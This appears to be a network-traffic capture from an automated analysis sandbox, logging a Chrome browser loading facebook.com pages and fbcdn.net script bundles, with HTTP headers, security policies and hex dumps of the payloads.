                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC73INData Raw: 33 65 0d 0a 66 6f 72 20 28 3b 3b 29 3b 7b 22 5f 5f 61 72 22 3a 31 2c 22 70 61 79 6c 6f 61 64 22 3a 6e 75 6c 6c 2c 22 6c 69 64 22 3a 22 37 34 31 39 39 32 33 39 33 33 37 36 33 33 31 38 35 31 38 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 3efor (;;);{"__ar":1,"payload":null,"lid":"7419923933763318518"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                80192.168.2.449829157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1202OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=3&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 5027
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykFkqlICWNRMtxv4I
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC5027OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 6b 46 6b 71 6c 49 43 57 4e 52 4d 74 78 76 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 36 33 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 6b 46 6b 71 6c 49 43 57 4e 52 4d 74 78 76 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 74 73 22 3a 22 69 53 62 77 61 56 74 62 49 6d 5a 68 62 47 4e 76 4f 6d 4a 79 62 33 64 7a 5a 58 4a 66 63 47 56 79
                                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundarykFkqlICWNRMtxv4IContent-Disposition: form-data; name="ts"1727585663404------WebKitFormBoundarykFkqlICWNRMtxv4IContent-Disposition: form-data; name="q"[{"app_id":"256281040558","posts":"iSbwaVtbImZhbGNvOmJyb3dzZXJfcGVy
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923934312864551", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923934312864551"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1923INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                81192.168.2.449833157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC374OUTGET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: +0ZQ6CpaMkkPWx1LhVlM1w==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 16:40:15 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 76jQTXgHSFFKi8/ow/kFVwp1e2VpGvqa+e7qbmsMX0YtsbEAIoUsrsq8Eh3/r3ci0Hv1DpphsjjbYQN+2vlJSg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10849
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC10848INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 61 4a 6f 65 53 48 6e 37 58 63 4e 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 62 6c 61 6b 65 6a 73 2d 31 2e 31 2e 30 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 22 49 6e 70 75 74 20 6d 75 73 74 20 62 65 20 61 6e 20 73 74 72 69 6e 67 2c 20 42 75 66 66 65 72 20 6f 72 20 55 69 6e 74 38 41 72 72 61 79 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ */__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                82192.168.2.449830157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC686OUTGET /data/manifest/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; _js_datr=d934ZsjiAffZHUJjG80fHvH1; wd=1280x907
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Set-Cookie: _js_datr=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1727585664; path=/; domain=.facebook.com; httponly
                                                                                                                                                                                                                                Set-Cookie: datr=d934ZsjiAffZHUJjG80fHvH1; expires=Mon, 03-Nov-2025 04:54:25 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923933385558893", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923933385558893"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1673INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC5INData Raw: 34 61 66 0d 0a
                                                                                                                                                                                                                                Data Ascii: 4af
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1201INData Raw: 7b 22 67 63 6d 5f 73 65 6e 64 65 72 5f 69 64 22 3a 22 31 35 30 35 37 38 31 34 33 35 34 22 2c 22 67 63 6d 5f 75 73 65 72 5f 76 69 73 69 62 6c 65 5f 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 65 64 67 65 5f 73 69 64 65 5f 70 61 6e 65 6c 22 3a 7b 22 70 72 65 66 65 72 72 65 64 5f 77 69 64 74 68 22 3a 33 37 36 7d 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 3f 72 65 66 3d 68 6f 6d 65 73 63 72 65 65 6e 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 6d 69 6e 69 6d 61 6c 2d 75 69 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 46 46 46 46 46 46 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 31 38 37 37 46 32 22 2c
                                                                                                                                                                                                                                Data Ascii: {"gcm_sender_id":"15057814354","gcm_user_visible_only":true,"edge_side_panel":{"preferred_width":376},"short_name":"Facebook","name":"Facebook","start_url":"\/?ref=homescreenpwa","display":"minimal-ui","background_color":"#FFFFFF","theme_color":"#1877F2",
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                83192.168.2.449834157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC374OUTGET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: xM0p4JC4uzf0Tq5z3PsKvA==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 04:51:19 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: X7AE2LRFqmTgq1Xy3S64eDKkYpXB0NaHhiyMg4/c7hXKN6+RGm5dEuNQu2qedSxqvGpy7i9VPUIXHZXC1d7qbA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:25 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 6156
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC6155INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 5b 22 24 22 2c 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 69 73 2e 72 6f 6f 74 3d 62 28 22 24 22 29 2e 66 72 6f 6d 49 44 4f 72 45 6c 65 6d 65 6e 74 28 61 29 2c 74 68 69 73 2e 75 70 64 61 74 69 6e 67 3d 21 31 2c 62 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 73 65 74 28 61 2c 22 44 4f 4d 43 6f 6e 74 72 6f 6c 22 2c 74 68 69 73 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 63 2e 67 65 74 52 6f 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                84192.168.2.449835157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC374OUTGET /rsrc.php/v3/yQ/r/WeajZf_EolU.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: Ngjnb72jUa3bDnjuqnOv0Q==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
